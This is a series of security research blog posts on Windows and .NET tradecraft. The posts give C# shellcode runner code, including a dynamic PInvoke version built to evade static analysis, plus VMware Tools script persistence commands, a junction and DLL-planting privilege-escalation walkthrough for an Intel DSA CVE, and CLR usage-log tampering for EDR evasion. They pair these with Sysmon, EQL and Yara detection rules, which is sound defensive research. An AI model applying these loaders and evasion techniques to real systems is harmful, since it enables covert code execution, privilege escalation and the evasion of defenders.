*Continue monitoring Usage Log creation and deletion events: Creation of log files for unmanaged processes that load the CLR and really have no business doing so should be treated as suspicious, especially those pesky script hosts.  Offensive operators will not always account for Usage Log tampering while executing their .NET tools when using commands like execute-assembly in Beacon. Keep in mind that some unmanaged processes legitimately load the CLR depending on the use case, such as mmc.exe. Usage Log deletion events could be an indicator of compromise if an actor tries to clean up rather than deploy an evasion technique.

*Continue monitoring for suspicious .NET runtime loads: Whereas monitoring log file creation events for detection could be hit or miss, monitoring for suspicious .NET CLR loads (e.g. clr.dll, mscoree.dll, etc.) could yield interesting results when tuned correctly.

*Continue hunting for CLR configuration knob additions or modifications: The addition of the NGenAssemblyUsageLog string in the HKCU\Software\Microsoft\.NETFramework and HKLM\Software\Microsoft\.NETFramework Registry keys could be an indicator of compromise. Hunt for the prepending of COMPlus_NGenAssemblyUsageLog in permanent user/system environment variables. Event ID 4657 is generated when the audit object access policy is enabled and the target key is audited for key write/set value events (thanks @Cyb3rWard0g):

*Continue hunting for suspicious process events: Identifying early process termination and DLL unload events may be interesting in the context of detecting Usage Log evasion techniques.

Conclusion

And that’s a wrap. Thank you for taking the time to read this post. Feel free to send me a DM if you discover any other evasion techniques!

-bohops

Unmanaged Code Execution with .NET Dynamic PInvoke

Yes, you read that correctly – “Dynamic Pinvoke” as in “Dynamic Platform Invoke”

Background

Recently, I was browsing through Microsoft documentation and other blogs to gain a better understanding of .NET dynamic types and objects. I’ve always found the topic very interesting mainly due to its relative obscurity and the offensive opportunities for defensive evasion. In this post, we’ll briefly explore ‘classic’ PInvoke (P/Invoke), discuss its inherent limitations, and introduce a lightweight technique (Dynamic PInvoke) that lets us call and execute native code in a slightly different way from managed code.

Notes & Caveats

  • In this post, .NET loosely refers to modern versions of the .NET Framework (4+). Other versions of .NET runtimes (e.g. Core) may be relevant.
  • For clarity, “Dynamic Pinvoke” in the context of this blog is not directly related to the incredible DInvoke (D/Invoke) project by TheWover and FuzzySec (although referenced in this blog post). DInvoke is an API for dynamically calling the Windows API, using syscalls, and evading endpoint security controls through powerful primitives and other advanced features such as module overloading and manual mapping.

Classic PInvoke Usage & Implications

Platform Invoke, also known as PInvoke, is a well-supported .NET technology for accessing unmanaged code from managed coding languages. If you have previously explored .NET managed-to-unmanaged interop code, you are likely very familiar with PInvoke methods and structures from the System.Runtime.InteropServices namespace. In offensive operations, a simple C-Sharp (C#) shellcode runner program with PInvoke signatures for native libraries and exported functions may look something like this:


using System;
using System.Runtime.InteropServices;

namespace ShellcodeLoader
{
    class Program
    {
        static void Main(string[] args)
        {
            byte[] x64shellcode = new byte[294] {
            0xfc,0x48, ... };

            IntPtr funcAddr = VirtualAlloc(
                              IntPtr.Zero,
                              (ulong)x64shellcode.Length,
                              (uint)StateEnum.MEM_COMMIT, 
                              (uint)Protection.PAGE_EXECUTE_READWRITE);
            Marshal.Copy(x64shellcode, 0, (IntPtr)(funcAddr), x64shellcode.Length);

            IntPtr hThread = IntPtr.Zero;
            uint threadId = 0;
            IntPtr pinfo = IntPtr.Zero;

            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            return;
        }

        #region pinvokes
        [DllImport("kernel32.dll")]
        private static extern IntPtr VirtualAlloc(
            IntPtr lpStartAddr,
            ulong size, 
            uint flAllocationType, 
            uint flProtect);

        [DllImport("kernel32.dll")]
        private static extern IntPtr CreateThread(
            uint lpThreadAttributes,
            uint dwStackSize,
            IntPtr lpStartAddress,
            IntPtr param,
            uint dwCreationFlags,
            ref uint lpThreadId);

        [DllImport("kernel32.dll")]
        private static extern uint WaitForSingleObject(
            IntPtr hHandle,
            uint dwMilliseconds);

        public enum StateEnum
        {
            MEM_COMMIT = 0x1000,
            MEM_RESERVE = 0x2000,
            MEM_FREE = 0x10000
        }

        public enum Protection
        {
            PAGE_READONLY = 0x02,
            PAGE_READWRITE = 0x04,
            PAGE_EXECUTE = 0x10,
            PAGE_EXECUTE_READ = 0x20,
            PAGE_EXECUTE_READWRITE = 0x40,
        }
        #endregion
    }
}
– GitHub Gist: https://gist.github.com/matterpreter/03e2bd3cf8b26d57044f3b494e73bbea
– Credit: @matterpreter (from this great post on Offensive PInvoke) and @Arno0x0x (for the shellcode)

When the managed code is compiled to a .NET Portable Executable (PE), the C# source is actually compiled to an intermediate language (MSIL) bytecode and passed to the Common Language Runtime (CLR) to facilitate execution. The composition of a .NET executable follows the standard PE/COFF format, so it will include the expected structures and headers like a native PE but with additional CLR header and data sections. However, if we analyze a .NET PE using a tool like pestudio and view the imports, we will notice there is only one entry called _CorExeMain:

We may have expected to see the Kernel32 exported methods from the shellcode runner, but these entries are not stored in the PE’s Import Lookup Table or Import Address Table (IAT). Rather, we can find PInvoke methods under the ImplMap table in the CLR metadata. Using the monodis program, we can quickly dump the contents of ImplMap that includes some extra metadata:

To review actual PInvoke signatures from the PE, MSIL can be easily reversed back to managed code (verbatim) and analyzed with programs like dnSpy and ILSpy:

So, what exactly are the implications of using classic PInvoke from an offensive security perspective? For starters, a collection of revealed PInvoke definitions within the code may be viewed as suspicious during simple manual analysis since PInvoke signatures cannot be easily obfuscated or adjusted. Furthermore, the following pitfalls of using PInvoke definitions are described in the Emulating Covert Operations – Dynamic Invocation blog by TheWover:

  • Static PInvoke definitions of Windows API calls will be included as an entry within the .NET assembly’s Import Address Table (IAT) when loaded, which could be easily scrutinized by automated tools (e.g. sandboxes).
  • PInvoke definitions are subject to monitoring by security tools that can detect ‘suspicious’ API calls (e.g. from EDR hooks).

So, how could this potentially be improved? Let’s take a look at Dynamic PInvoke.

Dynamic PInvoke Usage & Implications

Dynamic types and objects in .NET are quite interesting and very powerful. According to this Microsoft Doc, dynamic objects “expose members such as properties and methods at run time, instead of at compile time. This enables you to create objects to work with structures that do not match a static type or format.” By leveraging the System.Reflection.Emit namespace, dynamic assemblies can be created in a dynamic object and ultimately executed at runtime.

For background, you may already be familiar with the System.Reflection namespace that contains classes and types for retrieving and accessing data from .NET components such as assemblies, modules, members, metadata, etc. Through reflection, .NET methods can also be invoked, which is quite popular in offensive operations and for in-memory tradecraft. System.Reflection.Emit allows us to take this a step further for defining the objects and methods that we ultimately want to invoke using builder classes, modules, types, and methods. Now, let’s get to the substance of the post and talk about the very interesting typebuilder method – DefinePInvokeMethod().

In the previous section, a PInvoke method signature structure appeared as follows:

[DllImport("kernel32.dll")]
private static extern IntPtr VirtualAlloc(
    IntPtr lpStartAddr,
    ulong size, 
    uint flAllocationType, 
    uint flProtect);

For dynamic invocation, the PInvoke signatures must be structured in a way that is compatible with DefinePInvokeMethod(). As such, our next example will leverage the same shellcode execution technique and Kernel32 exports, but we will prepare a function that handles the builder logic and implement our own functions that map to each required Kernel32 call to keep the code simple and easy to follow.

The builder logic function (called DynamicPInvokeBuilder() in our example) creates a dynamic assembly to execute in the default appdomain. In the function, DefinePInvokeMethod() is called with our target Kernel32 export along with method attributes, arguments, and parameter types.

The code functions are relatively straightforward. We will simply retain the names of the Kernel32 exports for our example, but this is not required. Each function effectively calls DynamicPInvokeBuilder() with object arrays that map to the respective arguments, parameter types, and the return method type.

Our modified managed shellcode runner appears as follows:

using System;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Reflection.Emit;

namespace ShellcodeLoader
{
    class Program
    {
        static void Main(string[] args)
        {
            byte[] x64shellcode = new byte[294] {0xfc,0x48, ... };

            IntPtr funcAddr = VirtualAlloc(
                              IntPtr.Zero,
                              (uint)x64shellcode.Length,
                              (uint)StateEnum.MEM_COMMIT,
                              (uint)Protection.PAGE_EXECUTE_READWRITE);
            Marshal.Copy(x64shellcode, 0, (IntPtr)(funcAddr), x64shellcode.Length);

            IntPtr hThread = IntPtr.Zero;
            uint threadId = 0;
            IntPtr pinfo = IntPtr.Zero;

            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            return;
        }

        public static object DynamicPInvokeBuilder(Type type, string library, string method, Object[] args, Type[] paramTypes)
        {
            AssemblyName assemblyName = new AssemblyName("Temp01");
            AssemblyBuilder assemblyBuilder = AppDomain.CurrentDomain.DefineDynamicAssembly(assemblyName, AssemblyBuilderAccess.Run);
            ModuleBuilder moduleBuilder = assemblyBuilder.DefineDynamicModule("Temp02");

            MethodBuilder methodBuilder = moduleBuilder.DefinePInvokeMethod(method, library, MethodAttributes.Public | MethodAttributes.Static | MethodAttributes.PinvokeImpl, CallingConventions.Standard, type, paramTypes, CallingConvention.Winapi, CharSet.Ansi);

            methodBuilder.SetImplementationFlags(methodBuilder.GetMethodImplementationFlags() | MethodImplAttributes.PreserveSig);
            moduleBuilder.CreateGlobalFunctions();

            MethodInfo dynamicMethod = moduleBuilder.GetMethod(method);
            object res = dynamicMethod.Invoke(null, args);
            return res;
        }

        public static IntPtr VirtualAlloc(IntPtr lpAddress, UInt32 dwSize, UInt32 flAllocationType, UInt32 flProtect)
        {
            Type[] paramTypes = { typeof(IntPtr), typeof(UInt32), typeof(UInt32), typeof(UInt32) };
            Object[] args = { lpAddress, dwSize, flAllocationType, flProtect };
            object res = DynamicPInvokeBuilder(typeof(IntPtr), "Kernel32.dll", "VirtualAlloc", args, paramTypes);
            return (IntPtr)res;
        }

        public static IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, UInt32 dwCreationFlags, ref UInt32 lpThreadId)
        {
            Type[] paramTypes = { typeof(UInt32), typeof(UInt32), typeof(IntPtr), typeof(IntPtr), typeof(UInt32), typeof(UInt32).MakeByRefType() };
            Object[] args = { lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpThreadId };
            object res = DynamicPInvokeBuilder(typeof(IntPtr), "Kernel32.dll", "CreateThread", args, paramTypes);
            return (IntPtr)res;
        }

        public static Int32 WaitForSingleObject(IntPtr Handle, UInt32 Wait)
        {
            Type[] paramTypes = { typeof(IntPtr), typeof(UInt32) };
            Object[] args = { Handle, Wait };
            object res = DynamicPInvokeBuilder(typeof(Int32), "Kernel32.dll", "WaitForSingleObject", args, paramTypes);
            return (Int32)res;
        }

        public enum StateEnum
        {
            MEM_COMMIT = 0x1000,
            MEM_RESERVE = 0x2000,
            MEM_FREE = 0x10000
        }

        public enum Protection
        {
            PAGE_READONLY = 0x02,
            PAGE_READWRITE = 0x04,
            PAGE_EXECUTE = 0x10,
            PAGE_EXECUTE_READ = 0x20,
            PAGE_EXECUTE_READWRITE = 0x40,
        }
    }
}
– GitHub Gist: https://gist.github.com/bohops/4f98002ecfa85e173e8b4873690663f5
– Useful Reference: https://www.codeproject.com/Articles/9214/Dynamic-Invoke-from-Unmanaged-DLL

Once the PE is compiled and executed, the shellcode is launched:

Now, let’s take a look at a few observables to compare against classic PInvoke. First, the ImplMap table in the CLR metadata (captured by monodis) is no longer populated like it was in the previous section:

In dnSpy, we can clearly see the source code from the reversed MSIL. However, there are opportunities for further obfuscation and enhancement if desired:

Overall, dynamic invocation was a success! Let’s take a look at a few defensive opportunities….

Defensive Observables & Considerations

.NET Introspection: In this implementation, a dynamic assembly module is created for each PInvoke definition (which could be improved). This could be considered anomalous behavior, especially for repeatedly or randomly named assemblies.

EDRs and analysis tools (e.g. ProcessHacker) that have .NET introspection (e.g. via hooking or ETW) should be able to capture anomalous in-memory assembly loads (especially those without a disk-backing).

Malware Analysis: Based on personal observation, I have not seen much out there with regard to offensive use of DefinePInvokeMethod with the exception of some PowerShell tooling. As such, it may be compelling to leverage this opportunity to search for the method string as a part of static or sandbox analysis.

This simple Yara rule may be useful as a starting point for discovery:

rule Find_Dynamic_PInvoke
{

    meta:
        description = "Locate use of the DefinePInvokeMethod typebuilder method in .NET binaries or managed code."

    strings:
        $method = "DefinePInvokeMethod"

    condition:
        $method
}

Conclusion

As you can see, dynamic types, objects, and invocation are very powerful in .NET. There is way more opportunity to explore in this area such as working directly with MSIL using the ILGenerator class to define methods, enhancing the example DynamicPInvokeBuilder() method to support more interesting native functions, or leveraging other dynamic techniques to invoke native code (e.g. with function delegates).
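As a taste of the function-delegate approach mentioned above, an unmanaged export can be resolved at run time and marshaled into a callable delegate with Marshal.GetDelegateForFunctionPointer(). The following minimal sketch (not from the original post) uses MessageBoxW as a harmless stand-in:

```csharp
using System;
using System.Runtime.InteropServices;

class DelegateInvoke
{
    // Delegate matching the MessageBoxW export signature
    [UnmanagedFunctionPointer(CallingConvention.Winapi, CharSet = CharSet.Unicode)]
    delegate int MessageBoxW(IntPtr hWnd, string text, string caption, uint type);

    [DllImport("kernel32", CharSet = CharSet.Ansi)]
    static extern IntPtr LoadLibrary(string lpLibFileName);

    [DllImport("kernel32", CharSet = CharSet.Ansi)]
    static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);

    static void Main()
    {
        // Resolve the export at run time and marshal it into a callable delegate
        IntPtr user32 = LoadLibrary("user32.dll");
        IntPtr addr = GetProcAddress(user32, "MessageBoxW");
        var msgBox = Marshal.GetDelegateForFunctionPointer<MessageBoxW>(addr);
        msgBox(IntPtr.Zero, "Hello from a delegate", "Demo", 0);
    }
}
```

Note that the two DllImport signatures here are only used for resolution; the target function itself never appears in the assembly's ImplMap metadata.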

As always, thank you for taking the time to read this post. I hope you found it useful.

~ bohops

Analyzing and Detecting a VMTools Persistence Technique

Introduction

It is always fun to reexplore previously discovered techniques or pick back up old research that was put by the wayside in hopes of finding something new or different. Recently, I stood up an ESXi server at home and decided to take a quick peek at the VMware directory structure after installing the VMware Tools (vmtools) package in a Windows 10 Virtual Machine.

Among the directory contents were some batch files that I forgot about and the very interesting binary – VMwareToolBoxCmd.exe. After some quick Googling, it did not take long to land on Adam’s (@Hexacorn) incredible blog to find these two very informative posts about VMwareToolBoxCmd.exe, OS fingerprinting, and a privileged persistence technique with VMware Tools:

In this quick post, we will analyze this persistence technique and discuss a few strategies for detecting potential abuse.

The Technique

As Adam describes, VMwareToolBoxCmd.exe is a command utility for capturing VM information or changing the configuration of various and sundry virtual machine settings. One feature controls batch scripts that can be configured to run on VM state operations including power (power on), shutdown (power off), resume (from a suspended state), and suspend (entering a suspended state), as noted in the utility's script help subcommand:

There are several built-in batch scripts in the VMware Tools directory, but this does not preclude someone from using and enabling a custom script. For example, the following command script can be used to specify the execution of a custom script when the VM is powered on:

VMwareToolboxCmd.exe script power set "c:\evil\evilscript.bat"
VMwareToolboxCmd.exe script power enable

The command sequence itself is not as interesting as what it actually does. In the following Sysmon screenshot, we can see that content is actually written to the tools.conf file in \ProgramData:

Upon further inspection, the contents of this file appear as follows:

Coincidentally, there is another operation for resume under the powerops section directive. This was added previously by me to show that 1) batch files are not the only thing that can be configured and 2) the tools.conf file is the key component that enables the script execution functionality.

Note: For a complete example of what a configuration file may look like, take a look at tools.conf.example in the same \ProgramData directory or this sample file in VMware’s open-vm-tools repository.
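For reference, a tools.conf generated by the commands above might contain a fragment similar to the following sketch (key names per the open-vm-tools sample configuration; consult tools.conf.example for the authoritative syntax):

```ini
[powerops]
# Run a custom script when the VM is powered on
poweron-script=c:\evil\evilscript.bat
```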

After a quick shutdown and power-on, we can see our batch file payload (notepad.exe) is executed by cmd.exe as a child process of vmtoolsd.exe under the context of NT AUTHORITY\SYSTEM:

Defensive Considerations

Consider the following detection opportunities:

Sysmon

For event collection with Sysmon, consider monitoring tools.conf write (modification) events with an experimental rule. The following rule can be added to @SwiftOnSecurity‘s Sysmon-Config under the EVENT 11: “File created” section or under @olafhartong‘s Sysmon-Modular “11_file_create” rules:

<TargetFilename>C:\ProgramData\VMware\VMware Tools\tools.conf</TargetFilename>

Elastic Security

I’ve been digging into the Elastic Stack in recent months and felt that it would be a great opportunity to build a simple rule in Elastic Security. Conveniently, Elastic was kind enough to implement a rule creation wizard. Leverage this by selecting Elastic Security in Kibana, navigating to “Rules”, then selecting “Create New Rule”:

I created this ‘custom’ rule based on the Event Query Language (EQL) of another rule [License: Elastic License v2]:

file where event.type != "deletion" and
file.path :
(
"C:\ProgramData\VMware\VMware Tools\tools.conf"
)

After walking through the wizard and enabling the rule, I modified the tools.conf file which triggered this alert:

Of note, the community can contribute to Elastic’s open-source Detection Rules repository. There is a set of instructions to leverage a Python utility to help with the creation and validation process (outlined here).

Other Detection Opportunities

*Environment: In some environments, it is very plausible that operational power scripts/commands may already be enabled for legitimate reasons. If such is the case, audit the tools.conf file for target scripts and monitor accordingly. Although custom scripts can be specified, the following (default) operational state scripts are included with VMware Tools (in the \VMware Tools directory) and may be worth monitoring:

  • poweroff-vm-default.bat
  • poweron-vm-default.bat
  • resume-vm-default.bat
  • suspend-vm-default.bat

*Hunt: As shown in a previous screenshot, the parent process for the launched process is vmtoolsd.exe. Consider monitoring or hunting for suspicious child processes. Additionally, monitoring for VMwareToolBoxCmd.exe command usage could be worthwhile in some environments.

Conclusion

As always, thank you for taking the time to read this post.

~ bohops

CVE-2021-0090: Intel Driver & Support Assistant (DSA) Elevation of Privilege (EoP)

TL;DR

Intel Driver & Support Assistant (DSA) is a driver and software update utility for Intel components. DSA version 20.8.30.6 (and likely prior) is vulnerable to a local privilege escalation reparse point bug. An unprivileged user has nominal control over configuration settings within the web-based interface. This includes the ability to configure the folder location for downloads and data (e.g. installers and log files). An unprivileged user can change the folder location, coerce a privileged file copy operation into a “protected” directory through a reparse point, and deliver a payload (e.g. via a DLL loading technique) to execute unintended code.

Of note, a similar bug in DSA (CVE-2019-11114) was previously discovered by Rich Warren of the NCC Group. This technical advisory provides an excellent overview of that bug as well as operational details of DSA.

Walkthrough

The following walkthrough represents a simple methodology for discovering and exploiting the EoP bug in an unprivileged user context:

1 – The user selects the DSA tray icon on the Windows Task Bar:

2 – The DSA interface opens in the default web browser:

3 – Selecting the Settings link (on the left) opens up the DSA Settings page. The unprivileged user has the ability to change the Folder Location (Default in this case is C:\ProgramData\Intel\DSA):

4 – Taking note of the default folder path, the DACL entries of that path reveal that the Authenticated Users group has Full Control permissions over the directory:

5 – In the DSA directory, the folder structure contains the data, downloads, and logs.  The structure appears as follows:

6 – In the DSA Settings page, the unprivileged user can change the directory by selecting the Change Location button under Folder Location. The following browsing dialog box is presented:

7 – After changing the folder directory, the folder structure and contents under the previous Folder Location are moved to the new folder by the DSA service (DSAService.exe). For demonstration, a test file (test.txt) is created within the folder directory structure at c:\test\Downloads\test.txt. In the following screenshot, ProcMon shows the ‘move’ activity from the previous directory structure (c:\test) to the new directory structure (c:\temp) when the Folder Location is changed. This includes moving the test.txt file to c:\temp\Downloads\test.txt:

8 – Of course, this sets up an interesting test case for identifying a potential reparse point logic bug. In this case, a folder junction mount point is set on the previous DSA Folder Location directory structure (c:\test\downloads) and targeted at the protected c:\windows\system32 directory. The tool used to create the folder junction is CreateMountPoint by James Forshaw of Google Project Zero.

Note: an unprivileged user could leverage other tools to create junctions, such as the New-Item PowerShell cmdlet.
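For illustration, the junction setup can be sketched with PowerShell 5+ built-ins (paths are hypothetical and mirror the walkthrough; the existing folder must be removed first so the junction can take its place):

```powershell
# Hypothetical paths from the walkthrough - no third-party tooling required
Remove-Item -Recurse -Force 'C:\test\Downloads'
# Create a junction that redirects the old downloads folder to System32
New-Item -ItemType Junction -Path 'C:\test\Downloads' -Target 'C:\Windows\System32'
```

Creating a junction does not require elevated privileges, which is what makes this primitive useful to an unprivileged user.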

9 – For exploitation, a custom Dynamic Link Library (DLL) is planted in the current DSA Folder Location directory structure at c:\temp\downloads\ualapi.dll. In this case, ualapi.dll is specifically chosen because this DLL will be loaded at system start time (e.g. after a reboot) by the Windows Spooler service. The legitimate DLL is not present on Windows 10.

10 – After setting up the folder junction and staging ualapi.dll, the Folder Location is changed within the DSA Settings. The action causes the DSA service to ‘move’ ualapi.dll to c:\windows\system32:

11 – After a reboot, ualapi.dll is loaded by the Print Spooler to execute a payload as NT AUTHORITY\SYSTEM. In this case, the DLL spawns cmd.exe and subsequently notepad.exe:

Exploiting this in a programmatic fashion is an exercise for the reader 😉

Defensive Considerations

  • Organizations & Home Users: Update to the latest version of Intel Driver & Support Assistant (DSA). As of the draft of this post, the latest version is 21.4.29.8.
  • Vendor(s): In Microsoft’s Bug Bounty program details, Microsoft claims that “broad mitigations” will be applied to the reparse point bug class “in the future”. As such, Microsoft no longer offers Bug Bounty rewards for this class of bug. Until “broad mitigations” are applied to address this bug class operating system wide (i.e. like Hard Links in Win10 1809?), Microsoft and 3rd party vendors will likely have to continue to address these symlink issues on an individual basis.

Conclusion

Intel was notified of this bug in Sept 2020 and a patch was issued in June 2021.

Thank you for taking the time to read this post.

~ bohops

Abusing and Detecting LOLBIN Usage of .NET Development Mode Features

Background

As discussed in this previous post, Microsoft has provided valuable (explicit and implicit) insight into the inner workings of the functional components of the .NET ecosystem through online documentation and by open-sourcing .NET Core. .NET, in general, is a very powerful and capable development platform and runtime framework for building and running .NET managed applications. A powerful feature of .NET (on Windows in particular), is the ability to adjust the configuration and behavior of the .NET Common Language Runtime (CLR) for development and/or debugging purposes. This is achievable through various configuration interfaces such as environment variables, registry settings, and configuration files/property settings.

From an attacker’s perspective, configuration adjustments provide interesting opportunities for living-off-the-land-binary (lolbin) execution. In this short post, we’ll highlight a technique for turning pretty much any .NET executable into an opportunistic lolbin that abuses .NET development features by overriding Global Assembly Cache (GAC) path lookups. Furthermore, we’ll examine several defensive considerations for detecting malicious use of the presented technique.

The General Technique

Manipulating .NET development features to override the GAC is actually quite simple. As summarized from this Microsoft Doc, the following is required:

  • Configuration File – An element called developmentMode must be specified and set to true in the application configuration file (e.g. app.config) or the machine configuration file. Note: The machine configuration file (machine.config) has system-wide scope and requires administrator-level privileges for modification. Application configuration files can be created and/or modified at an unprivileged level (e.g. as placed in a writable directory along with a sacrificial/target assembly). An example assembly configuration appears as follows with the developmentMode element:
Source: Microsoft Docs
  • Environment Variable – An environment variable called DEVPATH must be set with a value that points to a file system directory path. When set, the CLR attempts to ‘resolve’ the target assembly dependencies in the path before locating the ‘unfound’ assemblies in the GAC (which is the default behavior).
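The configuration file referenced above appears as a screenshot in the original post. Per Microsoft’s documented schema, a minimal application configuration file with the developmentMode element looks like the following (the file name assumes a hypothetical target executable named app.exe):

```xml
<!-- app.exe.config - placed alongside the target assembly -->
<configuration>
   <runtime>
      <developmentMode developerInstallation="true"/>
   </runtime>
</configuration>
```

Note that the element only influences assembly resolution when the DEVPATH environment variable is also set.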

Let’s take a look at two loading behavior examples when executing UevAppMonitor.exe, a .NET application natively located in System32…

Example 1: Normal Execution

When executed under normal conditions, the UevAppMonitor.exe application will load dependencies, including unmanaged libraries out of System32, the CLR components, and referenced managed libraries from the GAC directories as noted in the following ProcMon screenshot.

Example 2: Modified Execution

Interestingly, UevAppMonitor.exe actually has an application configuration file located in the System32 directory:

For simplicity and to demonstrate the loading behavior, UevAppMonitor.exe and UevAppMonitor.exe.config are copied to a temporary directory, and UevAppMonitor.exe.config is modified with the required developmentMode element (as noted above):

Next, the DEVPATH environment variable is set to point to a desired load directory. As described in this post, there are several ways to create/inject an environment variable. In this case, the DEVPATH variable is assigned (temporarily) within the shell to point to the non-existent “c:\zzz” path for the chosen effect:
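For reference, the temporary assignment can be sketched as a Command Prompt transcript (prompt and working directory are hypothetical):

```
C:\temp> set DEVPATH=c:\zzz
C:\temp> UevAppMonitor.exe
```

Because the variable is set within the shell, it only applies to processes spawned from that session.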



When running UevAppMonitor.exe in the temporary directory that contains the UevAppMonitor.exe.config file, the CLR attempts to locate the assembly references in “C:\zzz” before properly resolving them in the GAC folders (since a reference is not found):

As a result, managed binaries can be used for a number of use cases with control over the directory lookup path. This includes but is not limited to the possibility of application control bypass with managed assembly modification (depending on the solution), general DLL hijack/sideloading, and persistence. Further exploration of these particular offensive use cases is an exercise for the reader.

Defensive Considerations

Consider these defensive opportunities for detection:

Monitor (and Hunt for) Application Configuration Files: There are numerous EXE/DLL app.config files located on the Windows operating system that control .NET functionality, including for .NET managed binaries and unmanaged binaries that leverage managed components. Many of these .config files are Windows or Microsoft signed. Modification of existing .config files (e.g. machine.config) and/or creation of new configuration files in another directory location should be a red flag. Furthermore, the developmentMode element in any app.config should be scrutinized (with very few exceptions, such as development environments). This element should not appear legitimately in a production/working environment (unless introduced by accident).

Add this experimental Sysmon rule to @SwiftOnSecurity‘s Sysmon-Config under the EVENT 11: “File created” section or under @olafhartong‘s Sysmon-Modular “11_file_create” rules for detecting .config file creation (+ modification) events:

<TargetFilename condition="end with">.config</TargetFilename>

Monitor for DEVPATH Environment Variable Creation Events: Temporary environment variable usage is likely difficult to detect, but for permanent additions (e.g. for actor persistence), the following experimental Sysmon rule can be added to Sysmon-Config under the “SYSMON EVENT ID 12 & 13 & 14 : REGISTRY MODIFICATION” section or under the Sysmon-Modular “12_13_14_registry_event” rules to detect the addition of the DEVPATH variable:

<TargetObject condition="end with">\Environment\DEVPATH</TargetObject>

Leverage Application Control Audit Features: Application Control is not just a prevention mechanism. Leverage audit mode features of application control solutions to enhance detection telemetry (e.g. for detecting unsigned DLL loads that would have been prevented) without block rules. For AppLocker, the event log is located at:  Event Viewer -> Application and Services Logs -> Microsoft -> Windows -> AppLocker. For WDAC, the log is located at: Event Viewer -> Application and Services Logs -> Microsoft -> Windows -> Code Integrity -> Operational. 3rd party security solutions may log events to another location.

Related Research

If interested, check out research from others that have discovered interesting ways to leverage .NET configuration features (e.g. CLR Configuration Knobs) for different use cases:

Conclusion

Thank you for taking the time to read this post!

-bohops

Investigating .NET CLR Usage Log Tampering Techniques For EDR Evasion

Introduction

In recent years, there have been numerous published techniques for evading endpoint security solutions and sources such as A/V, EDR, and logging facilities. The methods deployed to achieve the desired result usually differ in sophistication and implementation; however, effectiveness is usually the end goal (of course, with thoughtful consideration of potential tradeoffs). Defenders can leverage the native facilities of the operating system and support frameworks to build quality detections. One way to detect potentially interesting .NET behavior is by monitoring the Common Language Runtime (CLR) Usage Logs (“UsageLogs”) for .NET execution events.

In this quick post, we will identify how defenders are (likely) leveraging .NET Usage Logs for detection and forensic response, investigate ways to circumvent Usage Log monitoring, and discuss potential opportunities for catching Usage Log tampering behavior.

Using .NET CLR Usage Logs to Detect Suspicious Activity

When .NET applications are executed or when assemblies are injected into another process memory space (by the Red Team), the .NET runtime is loaded to facilitate execution of the assembly code and to handle various and sundry .NET management tasks. One task, as initiated by the CLR (clr.dll), is to create a Usage Log file named after the executing process once the assembly has finished executing for the first time in the (user) session context. This log file contains .NET assembly module data, and it serves as an information file for .NET native image autogeneration (auto-NGEN).

Prior to process exit, the CLR typically writes to one of these file paths (although there could be others):

  • <SystemDrive>:\Users\<user>\AppData\Local\Microsoft\CLR_<version>_(arch)\UsageLogs
  • <SystemDrive>:\Windows\<System32|SysWOW64>\config\systemprofile\AppData\Local\Microsoft\CLR_<version>_(arch)\UsageLogs

As an example, we can see that the powershell.exe.log Usage Log is created for the first time just prior to ‘gracefully’ terminating the powershell.exe process:

From a DFIR and threat hunting perspective, analyzing the Usage Logs is very useful for investigatory purposes, as outlined in this excellent blog post by the MENASEC Applied Research Team. From an endpoint monitoring standpoint, Endpoint Detection & Response solutions (‘EDRs’) are likely monitoring Usage Log file creation events to identify suspicious or unlikely processes that have loaded the .NET CLR. As an example, Olaf Hartong (@olafhartong) maintains the incredible Sysmon-Modular project and has graciously provided a rule config that monitors Usage Log activity for .NET 2.0 activity and risky LOLBINs. Red Teamers can certainly expect that many commercial vendors are monitoring Usage Logs in a similar fashion (e.g. to catch Cobalt Strike’s execute-assembly).

Before diving into the evasive techniques, let’s briefly discuss Configuration Knobs in .NET…

A Quick Primer on .NET CLR Configuration Knobs

While maintaining a wealth of valuable documentation for .NET Framework and subsequently releasing open-source .NET Core, Microsoft has provided valuable (explicit and implicit) insight into the inner workings of the functional components of the .NET ecosystem. .NET, in general, is a very powerful and capable development platform and runtime framework for building and running .NET managed applications. A powerful feature of .NET (on Windows in particular), is the ability to adjust the configuration and behavior of the .NET Common Language Runtime (CLR) for development and/or debugging purposes. This is achievable through .NET CLR Configuration Knobs controlled by environment variables, registry settings, and/or configuration files/property settings as retrieved by the CLRConfig.

Abusing configuration knobs is not a new concept. Other researchers have explored various techniques for leveraging knob settings to execute arbitrary code and/or evade defensive controls. A few recent examples include Adam Chester’s (@_xpn_) use of the ETWEnabled CLR configuration knob to disable Event Tracing for Windows (ETW) and Paul Laîné’s (@am0nsec) use of the GCName CLR configuration knob to specify a custom Garbage Collector (DLL) for loading arbitrary code and bypassing application control solutions. And of course, Casey Smith (@subTee) for exploring all things .NET including COR_PROFILER unmanaged code loading for defense evasion/UAC bypass and the Ghost Loader AppDomainManager injection technique (as further described by @netbiosX).

Adjusting .NET Configuration Knob Registry Settings To Evade CLR Usage Log File Creation

Interestingly, the .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). By simply specifying an arbitrary value (e.g. a fake output location or junk data), a Usage Log file for the .NET execution context will not be created. The NGenAssemblyUsageLog CLR configuration knob string value can be set at the following Registry keys:

  • HKCU\SOFTWARE\Microsoft\.NETFramework
  • HKLM\SOFTWARE\Microsoft\.NETFramework

Configuring the value within the HKCU hive applies to the active user context and influences log output that would otherwise be written to the <SystemDrive>:\Users\<user>\AppData\Local\Microsoft\CLR_<version>_(arch)\UsageLogs directory and/or Microsoft Office Hub paths. Configuring the value within the HKLM hive applies to the system context and influences log output that would otherwise be written to the <SystemDrive>:\Windows\<System32|SysWOW64>\config\systemprofile\AppData\Local\Microsoft\CLR_<version>_(arch)\UsageLogs directory paths. Let’s walk through a simple example to demonstrate expected and tampered behavior…

The following source code is compiled as a 64-bit .NET application called ‘test.exe’:

Before executing the application, take note that the UsageLogs directory is empty on this test machine. The directory may be well populated on production or test machines.

Once executed, a simple message box appears:

